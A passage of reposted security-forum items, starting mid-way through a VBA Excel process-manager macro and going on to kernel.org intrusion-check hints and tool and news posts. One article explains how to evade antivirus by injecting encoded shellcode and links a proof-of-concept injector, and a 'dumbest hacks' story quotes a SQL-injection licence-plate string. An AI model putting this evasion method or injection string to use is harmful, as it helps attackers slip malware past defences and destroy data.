UBound(abBuffer), lNeeded) = 1 Then CopyMemory lpSid, abBuffer(0), 4 strAccountName = Space(MAX_PATH) strDomainName = Space(MAX_PATH) lAccountName = MAX_PATH lDomainName = MAX_PATH If LookupAccountSid(vbNullString, lpSid, strAccountName, lAccountName, strDomainName, lDomainName, peUse) <> 0 Then If strDomainName = "" Then GetProcessOwner = Left(strAccountName, CLng(lAccountName)) Else GetProcessOwner = Left(strDomainName, CLng(lDomainName)) & "\" & Left(strAccountName, CLng(lAccountName)) End If End If End If Call CloseHandle(hToken) End If CloseHandle hProcess End If End Function Private Function GetTimes(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If Dim sFTCreation As FILETIME Dim sFTDummy As FILETIME Dim sFTCreationLocal As FILETIME Dim sSTCreation As SYSTEMTIME GetTimes = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If GetProcessTimes(hProcess, sFTCreation, sFTDummy, sFTDummy, sFTDummy) <> 0 Then If FileTimeToLocalFileTime(sFTCreation, sFTCreationLocal) <> 0 Then If FileTimeToSystemTime(sFTCreationLocal, sSTCreation) <> 0 Then GetTimes = CStr(sSTCreation.wYear) + "/" + CStr(sSTCreation.wMonth) + "/" + CStr(sSTCreation.wDay) + " " + CStr(sSTCreation.wHour) + ":" + CStr(sSTCreation.wMinute) + ":" + CStr(sSTCreation.wSecond) End If End If End If CloseHandle hProcess End If End Function Private Function GetType(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If Dim lWoW64 As Long Dim sSI As SYSTEM_INFO GetType = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If IsWow64Process(hProcess, lWoW64) Then GetNativeSystemInfo sSI GetType = IIf(sSI.wProcessorArchitecture > 0 And lWoW64 = 0, "64", "32") End If CloseHandle hProcess End If End Function Private Function Device2DriveFilename(ByVal strFilename As String) As String Dim varKeyDevice As Variant Device2DriveFilename = strFilename For Each varKeyDevice In dicDevices.Keys If StartsWith(strFilename, varKeyDevice) Then Device2DriveFilename = dicDevices(varKeyDevice) & Mid(strFilename, Len(varKeyDevice) + 1) End If Next End Function Private Function GetProcessFilename(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If Dim lLength As Long Dim strBuffer As String GetProcessFilename = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or PROCESS_VM_READ, 0, lProcessID) If hProcess <> 0 Then strBuffer = Space(MAX_PATH) Err.Clear On Error Resume Next lLength = GetProcessImageFileName(hProcess, strBuffer, Len(strBuffer)) If Err.Number = 453 Then lLength = K32GetProcessImageFileName(hProcess, strBuffer, Len(strBuffer)) End If On Error GoTo 0 GetProcessFilename = Device2DriveFilename(Left(strBuffer, CLng(lLength))) CloseHandle hProcess End If End Function Private Function GetDevices() As Dictionary Dim intIter As Integer Dim strBuffer As String Dim lLength As Long Dim dicDevices As Dictionary Set dicDevices = New Dictionary Set GetDevices = dicDevices For intIter = Asc("A") To Asc("Z") strBuffer = Space(MAX_PATH) lLength = QueryDosDevice(Chr(intIter) & ":", strBuffer, Len(strBuffer)) If lLength > 0 Then dicDevices.Add Left(strBuffer, InStr(strBuffer, vbNullChar) - 1), Chr(intIter) & ":" End If Next End Function Private Sub ProcessListToSheet(oCell) #If Win64 Then Dim hSnapshot As LongPtr #Else Dim hSnapshot As Long #End If Dim lRet As Long Dim sPE32 As PROCESSENTRY32 Dim strProcess As String Dim iIter As Integer Dim iColumn As Integer Dim iPositionNull As Integer AdjustTokenForDebug hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&) If hSnapshot <> INVALID_HANDLE_VALUE Then sPE32.dwSize = Len(sPE32) lRet = Process32First(hSnapshot, sPE32) iIter = oCell.Row iColumn = oCell.Column Do While lRet iPositionNull = InStr(1, sPE32.szExeFile, Chr(0)) If iPositionNull > 0 Then strProcess = Left(sPE32.szExeFile, iPositionNull - 1) Else strProcess = "" End If Cells(iIter, iColumn).Value = strProcess Cells(iIter, iColumn + 1).Value = sPE32.th32ProcessID Cells(iIter, iColumn + 2).Value = GetProcessFilename(sPE32.th32ProcessID) Cells(iIter, iColumn + 3).Value = GetProcessOwner(sPE32.th32ProcessID) Cells(iIter, iColumn + 4).Value = GetTimes(sPE32.th32ProcessID) Cells(iIter, iColumn + 5).Value = GetType(sPE32.th32ProcessID) iIter = iIter + 1 lRet = Process32Next(hSnapshot, sPE32) Loop CloseHandle hSnapshot End If End Sub Private Sub SuspendProcessByID(ByVal lProcessID As Long, ByVal bSuspend As Boolean) #If Win64 Then Dim hSnapshot As LongPtr Dim hThread As LongPtr #Else Dim hSnapshot As Long Dim hThread As Long #End If Dim lRet As Long Dim sTE32 As THREADENTRY32 hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0&) If hSnapshot <> INVALID_HANDLE_VALUE Then sTE32.dwSize = Len(sTE32) lRet = Thread32First(hSnapshot, sTE32) Do While lRet If sTE32.rh32OwnerProcessID = lProcessID Then hThread = OpenThread(THREAD_SUSPEND_RESUME, False, sTE32.th32ThreadID) If hThread <> 0 Then If bSuspend Then SuspendThread hThread Else ResumeThread hThread End If CloseHandle hThread End If End If lRet = Thread32Next(hSnapshot, sTE32) Loop CloseHandle hSnapshot End If End Sub Private Sub TerminateProcessByID(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If hProcess = OpenProcess(PROCESS_TERMINATE, 0, lProcessID) If hProcess <> 0 Then TerminateProcess hProcess, 0 CloseHandle hProcess End If End Sub Private Sub ExecuteCommands(oCell) Dim iIter As Integer Dim iColumn As Integer AdjustTokenForDebug iIter = oCell.Row iColumn = oCell.Column Do While Cells(iIter, iColumn + 1).Value <> "" Select Case LCase(Cells(iIter, iColumn).Value) Case "t": TerminateProcessByID Cells(iIter, iColumn + 2).Value Case "s": SuspendProcessByID Cells(iIter, iColumn + 2).Value, True Case "r": SuspendProcessByID Cells(iIter, iColumn + 2).Value, False End Select iIter = iIter + 1 Loop End Sub Private Sub AdjustTokenForDebug() #If Win64 Then Dim hToken As LongPtr #Else Dim hToken As Long #End If Dim sTP As TOKEN_PRIVILEGES If OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken) <> 0 Then If LookupPrivilegeValue("", "SeDebugPrivilege", sTP.LuidUDT) <> 0 Then sTP.PrivilegeCount = 1 sTP.Attributes = SE_PRIVILEGE_ENABLED If AdjustTokenPrivileges(hToken, False, sTP, 0, ByVal 0&, ByVal 0&) <> 0 Then End If End If CloseHandle hToken End If End Sub Sub MacroProcessList() Range("A7:G65000").ClearContents Set dicDevices = GetDevices() ProcessListToSheet Range("B7") Range("A6:G65000").Sort "Process executable", xlAscending, header:=xlYes End Sub Sub MacroExecuteCommands() ExecuteCommands Range("A7") End Sub Sursa: http://blog.didierstevens.com/2011/10/15/taskmanager-runs-on-64-bit-excel/

kernel.org status: hints on how to check your machine for intrusion From: Greg KH <greg-AT-kroah.com> To: Linux Kernel Mailing List <linux-kernel-AT-vger.kernel.org> Subject: kernel.org status: hints on how to check your machine for intrusion The compromise of kernel.org and related machines has made it clear that some developers, at least, have had their systems penetrated. As we seek to secure our infrastructure, it is imperative that nobody falls victim to the belief that it cannot happen to them. We all need to check our systems for intrusions. Here are some helpful hints as proposed by a number of developers on how to check to see if your Linux machine might be infected with something: 0. One way to be sure that your system is not compromised is to simply do a clean install; we can all benefit from a new start sometimes. Before reinstalling any systems, though, consider following the steps below to learn if your system has been hit or not. 1. Install the chkrootkit package from your distro repository and see if it reports anything. If your distro doesn't have the chkroot package, download it from: http://www.chkrootkit.org/ Another tool is the ossec-rootcheck tool which can be found at: http://www.ossec.net/main/rootcheck And another one is the rkhunter program: http://www.rootkit.nl/projects/rootkit_hunter.html [Note, this tool has the tendancy to give false-positives on some Debian boxes, please read /usr/share/doc/rkhunter/README.Debian.gz if you run this on a Debian machine] 2. Verify that your package signatures match what your package manager thinks they are. To do this on a rpm-based system, run the following command: rpm --verify --all Please read the rpm man page for information on how to interpret the output of this command. To do this on a Debian based system, run the following bash snippet: dpkg -l \*|while read s n rest; do if [ "$s" == "ii" ]; then echo $n; fi; done > ~/tmp.txt for f in `cat ~/tmp.txt`; do debsums -s -a $f; done If you have a source-based system (Gentoo, LFS, etc.) you presumably know what you are doing already. 3. Verify that your packages are really signed with the distro's keys. Here's a bash snippet that can do this on a rpm based system to verify that the packages are signed with any key, not necessarily your distro's key. That exercise is left for the reader: for package in `rpm -qa`; do sig=`rpm -q --qf '%{SIGPGP:pgpsig}\n' $package` if [ -z "$sig" ] ; then # check if there is a GPG key, not a PGP one sig=`rpm -q --qf '%{SIGGPG:pgpsig}\n' $package` if [ -z "$sig" ] ; then echo "$package does not have a signature!!!" fi fi done Unfortunately there is no known way of verifying this on Debian-based systems. 4. To replace a package that you find suspect, uninstall it and install it anew from your distro. For example, if you want to reinstall the ssh daemon, you would do: $ /etc/init.d/sshd stop rpm -e openssh zypper install openssh # for openSUSE based systems yum install openssh # for Fedora based systems Ideally do this from a live cdrom boot, using the 'rpm --root' option to point rpm at the correct location. 5. From a liveCD environment, look for traces such as: a. Rogue startup scripts in /etc/rc*.d and equivalent directories. b. Strange directories in /usr/share that do not belong to a package. This can be checked on an rpm system with the following bash snippet: for file in `find /usr/share/`; do package=`rpm -qf -- ${file} | grep "is not owned"` if [ -n "$package" ] ; then echo "weird file ${file}, please check this out" fi done 6. Look for mysterious log messages, such as: a. Unexpected logins in wtmp and /var/log/secure*, quite possibly from legitimate users from unexpected hosts. b. Any program trying to touch /dev/mem. c. References to strange (non-text) ssh version strings in /var/log/secure*. These do not necessarily indicate *successful* breakins, but they indicate *attempted* breakins which means your system or IP address has been targeted. 7. If any of the above steps show possible signs of compromise, you should investigate further and identify the actual cause. If it becomes clear that the system has indeed been compromised, you should certainly reinstall the system from the beginning, and change your credentials on all machines that this machine would have had access to, or which you connected to through this machine. You will need to check your other systems carefully, and you should almost certainly notify the administrators of other systems to which you have access. Finally, please note that these hints are not guaranteed to turn up signs of a compromised systems. There are a lot of attackers out there; some of them are rather more sophisticated than others. You should always be on the alert for any sort of unexpected behavior from the systems you work with. thanks, greg k-h Sursa: kernel.org status: hints on how to check your machine for intrusion [LWN.net]

Bypassing Anti-virus using Code Injection Technique Author: Amit Malik aka DouBle_Zer0 Contents Introduction Antivirus Executables PEview Encrypter/packer/protector The Concept of Injector Video Demonstration Download Injector References Introduction This article throws light on how 'Code Injection' or 'DLL Injection' technique can be used as prominent weapon along with other techniques to bypass Anti-virus softwares. It also explains top level technical details revolving around EXE internals, protectors/packers, encoded shellcodes, inner working of Antivirus etc Accompanying this article, you will find video demonstration of 'Injector (POC Tool)' which shows code injection technique to successfully bypass Antivirus software on the system. Antivirus Antivirus (or anti-virus) Software is used to prevent, detect, and remove, malware, including computer viruses, worms, and Trojan horse. Such programs may also prevent and remove adware, spyware, and other forms of malware. @ Wikipedia Antivirus play a major role for the security of a system. But for hackers/ pentesters , it creates some big problems. During the post exploitation phase we have some sort of excess on the victim machine and generally we want to upload some tools on the victim machine for better control but here antivirus play with our tools and detect them as a malicious file and delete them. Now it may be possible if you are using your own tool then antivirus may fail to detect it but this is rare situation during a pentesting. In case, if we use publicly exposed tools then there is higher probability of getting caught by antivirus. A simple example: Suppose we have a reverse shell now we know that this is a single connection to our machine from our victim and we don't want to loose it at any condition. So we upload some tools on the victim machine like netcat or other executable (may be generated from metasploit) to get a backup connection etc.. may be to upgrade our shell to merepreter shell. But our victim is using a anti virus and anti virus delete the uploaded files. Now we need something else means either bypass AV or write our own code. But the question here is how antivirus is able to detect our executables (.exe). Executables (.EXE) Basically exe files not only contain your code but also contain some important data that is only meaningful for a Operating system loader. AAnd technical name for that data is PE (portable executable) file header/ PE file format. I am not explaining pe file format here. Here is the snapshot, PEview - PE File Viewer Tool So when we execute exe, windows loader first read the PE header and on the basis of header information loader loads the file into memory.br> Executable Detection (top level view): So when we copy the file on system then antivirus scan the file (check for known signatures) and if the file is malicious then delete the file. Encrypter/packer/protector The above technologies (Encrypter/packer/protector) are not only to evade anti viruses. People also use them for ethical work. Basically encryptor/packers encrypt/pack the file and add the decryption/unpacking routine into the file. So when we execute the file windows loader loads the file on the basis of PE header (encryptor/packer does not pack the PE header of a file they only change the necessary values in PE header. Eg. Address of entry point, sections etc..). so the unpacking work something like this: SSo unpacking/decryption routine unpack the code and then jump on the Original Entry Point (on our real code freshly recovered from unpacking routines). So if we pack the exe with any packer then Antivirus should not be able to detect the exe?. Ok now its time to do some practical. Pack any malicious file with UPX (a freeware packer) and then test again with Antivirus. You should see that your AV is again popping up the alert and telling that hey don't try to fool me it is malicious.. But our file was packed how AV still know that it is a malicious file and the answer is AV has also signature for UPX, so what AV is doing it loads the file detect the packer then decrypt/unpack(AV also know how to unpack UPX packed files ?) the file and then test the file, And this is the reason that AV still know that file is malicious. But hey where is proof that AV is doing all this shit to test file. Ok to prove just open the same packed file in a hex editor and just overwrite the starting bytes with some garbage values and then again test it with your AV. Now you should see that AV is saying that file is clean (Reason: Because file is corrupted and AV have no option to unpack/decrypt it) fantastic that's all we want. Concept of Code Injection - Ingeneric way to bypass AV Because exe files are going to detected by AVs( at least if you pack them with the publicly exposed packers/encryptors). So we have to think in a another way. And the another way is: split the exe into two parts (not physically) The core code (the actual code that performs a specific task for eg. Bind shell) The interface - a mechanism that will inject the code into memory and execute that code. So the functioning is something like this: Note that from the above explanation we know that shellcode/code into a file is not going to be detected by AV because AV don't know how to decode shellcode. (Don't talk about Heuristic, I know AV vendors are joking ?) Important Note: you may be thinking that why I am saying encoded shellcode because if you use metasploit shellcodes there signatures may be in AVs. If you encode the shellcode with any available encoder in metasploit then AVs not able to decode it in a file and not able to detect it (if you don't understand it read the whole stuff again ?). Although in some cases (Eg. Avast may be with others also) AV not alert if you use shellcodes that are not encoded because AV think that txt file are lame files. But if you force fully scan the file than AV alert. Second part of the concept is the interface that will inject the code into a process. Code injection is not a new concept (dll injection is one of the most popular example). Note: All the things are generic and are not specific to any tool or shellcodes. Metasploit and shellcodes are used only to demonstrate the concept. You can also inject your codes "that are detectable to AV in exe mode" with this method and can bypass AV. Things that you can do with this method: Can backdoor a process Can provide many backup shells (every type) We can use publically available tool (malicious) without fear and too many other things limited to your wild imaginations. Download Injector You can click on below link to download the source code and executable for the Injector - Proof of Concept code. http://securityxploded.net/download/Injector.rar Sursa si video demo: Bypassing Anti-virus using Code Injection Technique | www.SecurityXploded.com

NPE File Analyzer View and Edit 32bit and 64bit Portable Executable (PE) Files NPE File Analyzer is a utility that allow users to view and edit 32bit and 64bit Portable Executable (PE) files, such as .EXE .DLL and .SYS files. NPE provides functions for inspection of unknown binaries, you can analyze sections, resources, import and export tables, relocations, TlsTable, and much more. It has a built-in process manager to analyze running processes and loaded modules. It is possible to fix a dumped file, realign file, extract PE(s) from a file, add code cave and compare PE files to check for differences in the PE structure. NPE can also generate MD5 hash, SHA1 hash and CRC32 hash of a file. It has full support for PEiD plugins and it has also a built-in hex editor that allows you to edit a file. Screenshots Features Add and Find Code Caves Add to Explorer Context Menu ASCII and UNICODE Strings Viewer Bound Import Viewer Change Icon (only 32-bit PEs supported) Compare PE Files Delay Import Viewer Edit 32bit and 64bit portable executables Export and Import Viewer Extract Portable Executable Files File Hasher (MD5 SH1 CRC32) File Location Calculator Full PEiD Plugin Compatibility Hex Editor Load Config Viewer PE Editor PE Section Viewer Processes and Modules Manager Remove Base Relocations Resource Viewer TimeDateStamp Adjuster TLS Editor Download: http://downloads.novirusthanks.org/files/npe_setup.exe Portable: http://downloads.novirusthanks.org/files/portables/npe_portable.zip Sursa: NPE File Analyzer - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks

Secure Android kernel could make for 'classified' smart phones By Henry Kenyon Oct 13, 2011 A research team from Google, George Mason University and the National Security Agency have developed a hardened kernel for the Android 3.0 operating system that could solve the problem of using smart phones in military operations and emergency response. The kernel, which is in the final stages of certification testing, opens the way for the Army to begin issuing smart phones or tablet-type wireless devices to troops in combat operations. The White House also is interested because the hardened kernel could help fulfill a government plan to create a secure national wireless network for first responders, Michael McCarthy, operations director of the Army's Brigade Modernization Command's Mission Command Complex, said at the AUSA Annual Meeting and Exposition in Washington on Oct. 10. McCarthy also heads the service's Connecting Soldiers to Digital Applications (CSDA) program, the lead organization involved in selecting handheld wireless technologies for military use. One of the problems vexing Army smart phones has been getting the right security accreditation to operate on military networks and eventually on classified networks. This is particularly important to allow smart phones to connect into battlefield networks, McCarthy said. The initial goal is to get the hardware and software accredited. "We have to have a way to verify the identity of the user of the smart phone. So it's a triple-level security measure that we have to deal with," he said. There were delays in getting the operating system accredited until NSA came forward several months ago and offered to expedite the approval process, McCarthy said. The new effort kicked off with a series of meetings with CSDA program personnel and representatives from NSA and the National Institute of Standards and Technology. The Android kernel is now being tested for a Federal Information Processing Standard 140-2 certification, which is expected by mid-October. "That's the first level of security that we've got to get before we start moving onto being able to ultimately do secret [communications]," he said. After the testing is complete, it is just a matter of filling out the certification paperwork, McCarthy said. "That is a game-changer for the security business because it then sets the conditions so that in the second quarter [late March 2012] they can do the certification of the Secure Sockets Layer, which then gives us the ability to operate at the classified levels," he said. In addition to the Army's plans to provide troops with smart phones, the Obama administration was attracted to the technology to support two of its initiatives. One is an effort by the White House Communications Office to move the executive branch from BlackBerry devices to Android-based phones. The reason is because Android devices with the new kernel can be secured at a higher clearance level than BlackBerry devices, McCarthy said. In June 2011, NSA approached McCarthy about working on the problem. The White House interest came from the Office of Science and Technology Policy, run by federal CTO Aneesh Chopra. "They had apparently been tracking the CSDA project on the Internet for several months, and they wanted me to come and give them a briefing," he said. McCarthy thought he was going to brief White House staffers, but instead he presented to Chopra, his deputy, senior representatives from the Justice Department and the FBI. The other, wider government interest tied into an ongoing White House initiative to create a secure, wireless national public safety infrastructure. The infrastructure would combine all of the nation’s public safety organizations into a secure wireless system, moving first responders away from radio-based systems. "It is potentially a multi-billion dollar effort," he said. Justice is the lead civilian agency working on the White House effort. There, the FBI and its scientists are the responsible for developing their version of CSDA. The FBI and Justice are also planning to conduct pilot projects, but on a larger scale than the Army, McCarthy said. One of the concerns behind the government's drive is that the radio communications networks used by federal, state and local response agencies are not very secure. This is a special concern for law enforcement and emergency response organizations’ operational channels, which could be subject to interception, spoofing and jamming. "They're looking at replacing radio with a smart phone," he said. Sursa: http://gcn.com/Articles/2011/10/11/AUSA-secure-andriod-kernel-technology.aspx

Heroes of the Computer Revolution by Steven Levy Hackers: Heroes of the Computer Revolution (ISBN 0-385-19195-2) is a book by Steven Levy about hacker culture. It was published in 1984 in Garden City, New York by Anchor Press/Doubleday. Levy describes the people, the machines, and the events that defined the Hacker Culture and the Hacker Ethic, from the early mainframe hackers at MIT, to the self-made hardware hackers and game hackers. Immediately following is a brief overview of the issues and ideas that are brought forward by Steven Levy's book, as well as a more detailed interpretation of each chapter of the book, mentioning some of the principal characters and events. The book saw an edition with a new afterword (entitled "Afterword: Ten Years After") by the author in 1994.[1] In 2010, a 25th anniversary edition with updated material was published by O'Reilly.[2] Download: http://www.dvara.net/HK/LevyStevenHackers1&2.pdf Informatii: Hackers: Heroes of the Computer Revolution - Wikipedia, the free encyclopedia Interesant de citit: http://en.wikipedia.org/wiki/Hacker_Ethic

Google shutdowns some products 10/14/2011 10:03:00 AM We aspire to build great products that really change people's lives, products they use two or three times a day. To succeed you need real focus and thought-thought about what you work on and, just as important, what you don’t work on. It's why we recently decided to shut down some products, and turn others into features of existing products. Here's the latest update on what's happening: Code Search, which was designed to help people search for open source code all over the web, will be shut down along with the Code Search API on January 15, 2012. In a few weeks we'll shut down Google Buzz and the Buzz API, and focus instead on Google+. While people obviously won't be able to create new posts after that, they will be able to view their existing content on their Google Profile, and download it using Google Takeout. Jaiku, a product we acquired in 2007 that let users send updates to friends, will shut down on January 15, 2012. We'll be working to enable users to export their data from Jaiku. Several years ago, we gave people the ability to interact socially on iGoogle. With our new focus on Google+, we will remove iGoogle's social features on January 15, 2012. iGoogle itself, and non-social iGoogle applications, will stay as they are. The University Research Program for Google Search, which provides API access to our search results for a small number of approved academic researchers, will close on January 15, 2012. In addition, later today the Google Labs site will shut down, and as previously announced, Boutiques.com and the former Like.com websites will be replaced by Google Product Search. Changing the world takes focus on the future, and honesty about the past. We learned a lot from products like Buzz, and are putting that learning to work every day in our vision for products like Google+. Our users expect great things from us; today’s announcements let us focus even more on giving them something truly awesome. Posted by Bradley Horowitz, Vice President, Product Sursa: http://googleblog.blogspot.com/2011/10/fall-sweep.html

Kindle source code Amazon is pleased to make available to you for download an archive file of the machine readable source code ("Source Code") corresponding to modified software packages used in the Kindle device. By downloading the Source Code, you agree to the following: AMAZON AND ITS AFFILIATES PROVIDE THE SOURCE CODE TO YOU ON AN "AS IS" BASIS WITHOUT REPRESENTATIONS OR WARRANTIES OF ANY KIND. YOU EXPRESSLY AGREE THAT YOUR USE OF THE SOURCE CODE IS AT YOUR SOLE RISK. TO THE FULL EXTENT PERMISSIBLE BY APPLICABLE LAW, AMAZON AND ITS AFFILIATES DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. AMAZON AND ITS AFFILIATES WILL NOT BE LIABLE FOR ANY DAMAGES OF ANY KIND ARISING FROM THE USE OF THE SOURCE CODE, INCLUDING, BUT NOT LIMITED TO DIRECT, INDIRECT, INCIDENTAL, PUNITIVE, AND CONSEQUENTIAL DAMAGES. Click on the links below to download an archive file of the Kindle machine readable Source Code: Download: http://www.amazon.com/gp/help/customer/display.html?nodeId=200203720

Top 6 Dumbest Hacks of All Time By David Strom / October 10, 2011 Alan Wlasuk, CEO of 403 Web Security, has compiled a list of the top six dumbest hacks of all time. While hackers can be dangerous, Alan shows that not every hacker is a brilliant mastermind. Think of the always amusing Darwin Awards pictured in our icon at left. With many of these exploits, the hacker left unintended clues in their code to make them easier to be found. Late last year, Kelly Osborne (of Dancing With the Stars fame, no further comment) had her email account hacked. The hacker, wanting to not only look at all of her past emails new ones as well, had Kelly's emails forwarded to his own, personal email account. This seemed like a pretty easy trail to follow. Self proclaimed hacktivist Shahee Mirza and several associates defaced a Bangladesh government military website, Rapid Action Battalion, with the following message: "GOVERNMENT DOES NOT TAKE ANY STEP FOR ICT DEVELOPMENT. BUT PASSED A LAW ABOUT ANTI-CYBER CRIME. YOU DO NOT KNOW WHAT IS THE CYBER SECURITY OR HOW TO PROTECT OWNSELF. LISTEN. HACKERS R NOT CRIMINAL. THEY R 10 TIME BETTER THAN YOUR EXPERT. WE ARE GINIOUS THAN YOU CAN'T THINK. DEFACED FROM BANGLADESH." Unfortunately 21-year old Mirza also left the banner that clearly stated, "HACKED BY SHAHEE_MIRZA." Obviously not the "GINIOUS" indicated in his hack, Mirza may end up with 10 years in a Bangladesh federal prison. One can only imagine what the prisons are like in one of the poorest countries in the world. Famous for his Samy Worm, Samy Kamkar was responsible for a virus-like attack that infected over 1 million MySpace accounts in 2006. Amongst other malicious effects was the 'Samy is my hero' addition to the MySpace homepage of each of the million victims. As part of his obvious ego addition, Samy went on to boast of his hacking feat in a blog post. Unfortunately for Samy, the blog contained a picture of him with a license plate in the background, which was then used to find Samy. 20-year old Sayaka Fukuda had her iPhone stolen on the streets of New York City. The thief, Daquan Mathis, while enjoying his new iPhone took a picture of himself (dressed in the same clothes he wore during the mugging), which he then sent to his own email address. Unfortunately for Mathis, Fukuda's iPhone email account could be accessed on the Internet (like almost every such account). Given his email address it was a simple matter to track Mathis down, made even simpler by the fact the police had his picture. There are many stories about people tracking down their smartphones. By all accounts, Eduard Lucian Mandru is a very clever hacker. His 2006 hack of the U.S. Department of Defense (DOD) computer system went undetected for years, with the authorities only having Mandru's email address (wolfenstein_ingrid@yahoo.com) as their single clue. Mandru's downfall and arrest in 2009, however, came about when he used the same wolfenstein_ingrid@yahoo.com email address on the resume that he posted on numerous job boards. Sometimes it pays to use different email addresses for different tasks, don't you think? Alan was not sure if this hack is dumb or just really fun. One clever hacker realized that recent speed traps use cameras that automatically register your speed, take a picture of you license plate, and then use character recognition to translate you license plate number into something they can use as a lookup within the DMV database. With this in mind, he changed his license plate number to ('ZU 0666', 0, 0); Drop Database Table. If the DMV uses this string of characters in their database lookup it has a good chance of deleting all of the database records containing his actual license plate number, ZU 0666. This has got to be 10 out of 10 on the creativity scale, and once again showing the importance of knowing what SQL injection and little Bobby tables is all about. Sursa: http://www.readwriteweb.com/hack/2011/10/top-6-dumbest-hacks-of-all-tim.php

WLAN Security Megaprimer Download! We are happy to announce the general availability of the WLAN Security Megaprimer course DVD! ith over 40+ HD videos containing 12+ hours of Wireless Ownage, this DVD weighs in at around 4.2 Gigabytes! A quick breakdown of the course topics and associated videos is available here. We are now offering a certification - SecurityTube Wi-Fi Security Expert (SWSE) which uses this DVD as the courseware. Visit the Certifications page for more details! Core Course Material Download Links: 1. Mirror thanks to Mister_X from the Aircrack Team: http://securitytube.aircrack-ng.org/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso 2. Mirror thanks to Chaos Darmstadt: http://private.chaos-darmstadt.de/~alech/securitytube/WLAN-Security-Megaprimer-v1.iso 3. Mirror thanks to KokelNet.de (both IPv4 and IPv6!): http://securitytube.kokelnet.de/DVDs/WLAN-Security-Megaprimer-v1.iso 4. Mirror to the BofH of Nikhef (both IPv4 and IPv6!): http://wipkip.nikhef.nl/events/securitytube/DVD/WLAN-Security-Megaprimer-v1.iso 5. Mirror thanks to y0ug: http://mirror2.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso http://mirror.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso 6. Mirror thanks to Bernard from Insecure.co.nz : http://www.insecure.co.nz/WLAN-Security-Megaprimer-v1.iso 7. Mirror thanks to djekl : http://securitytube.djekl.co.uk/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso Torrents: 1. Torrent thanks to Christiaan Rakowski: http://csrakowski.dyndns.info/files/WLAN-Security-Megaprimer-v1.iso.torrent 2. Torrent thanks to Tobias Koopmann: http://tracker.kokelnet.de/torrents/WLAN-Security-Megaprimer-v1.iso.torrent MD5 Hash: 939d8aa5eb2cd0fa63295953ecf36580 Mai multe informatii: http://thehackernews.com/2011/10/swse-most-advanced-wi-fi-hacking-and.html Sursa: Megaprimers Download and Support

GateOne Beta - Terminal emulator for HTML5 web browsers Posted by THN Reporter On 10/14/2011 05:47:00 AM The software makes use of WebSockets to connect a server backend written in Python and a frontend written for modern browsers in JavaScript, HTML5 and CSS. The frontend doesn't require any browser plug-ins to be installed.Gate One also supports HTTP over SSL (https) secure connections from the browser to the server and authentication technologies such as Kerberos. It has its own internal plug-in system (plug-ins can be written in Python, JavaScript and CSS); currently available plug-ins for Gate One include SSH client connections, session recording and playback, and a bookmark manager for storing terminal sessions. Top features: * No browser plugins required! * Supports multiple simultaneous terminal sessions. As many as your hardware can handle. * Users can re-connect to their running terminals whenever they like from anywhere. * Can be embedded into other applications. Add a terminal--running whatever application(s) you want--to your web app! Would be vastly superior to say, a Java-based serial console applet (hint hint). * Includes powerful plugin system that supports plugins written in Python, JavaScript, and even CSS (yes, you can write a CSS-only plugin). * The Gate One server can be stopped & started without users losing their running terminal applications (even SSH sessions stay connected!). In essence, worry-free upgrades! * The SSH plugin allows users to duplicate sessions without having to re-enter their username and password (it re-uses the existing SSH tunnel). * Provides users with the ability to play back and save/share their terminal sessions via a self-contained HTML playback file. * Similarly, supports server-side logging, recording, and video-like playback of user sessions. It can even log to syslog to support whatever centralized logging system you want. * Keberos-based Single Sign-on support is included. It even works with Active Directory. Other authentication options are available as well. Download: https://github.com/liftoff/GateOne/downloads Sursa si demo: GateOne Beta - Terminal emulator for HTML5 web browsers ~ THN : The Hacker News

Hcon's Security Testing Framework (Hcon STF) v0.1beta Posted by THN Reporter On 10/13/2011 02:16:00 PM After the first demo of Hfox, many people asked about a Chromium based framework for penetration testing/ethical hacking. After 3 months of work and research, and some input from AJ, the following tool has been developed for the arsenal of Hcon’s tools: Specifications 1. Based on Chromium Source (iron build) version 14. 2. Works for ever need of hacking/penetration testing such as recon, enumeration, social engineering, exploitation, vulnerability assessment, anonymity, mobile tools, and reporting. 3. More secure and tracking free from Google and Stable than other Chromium-based builds. 4. Over 100 tools integrated with easy-to-use interface. 5. Tested and heavily modified tools with suggestions contributed by professional penetration testers, web developers and security researchers. 6. Free and open source software. 7. Totally portable (no need to install). You can carry it around in your USB storage, memory card, etc. 8. Runs on all Windows, including Windows XP, VISTA, 7 License : Many Free & open source licenses Contributers : Thanks to AJ's input to this project on UI changes. Official project page: http://www.hcon.in/hstf.html Main site : http://www.hcon.in/ Another project and based on firefox : Hfox v 0.3 http://www.hcon.in/hfox.html Sursa: http://thehackernews.com/2011/10/hcons-security-testing-framework-hcon.html

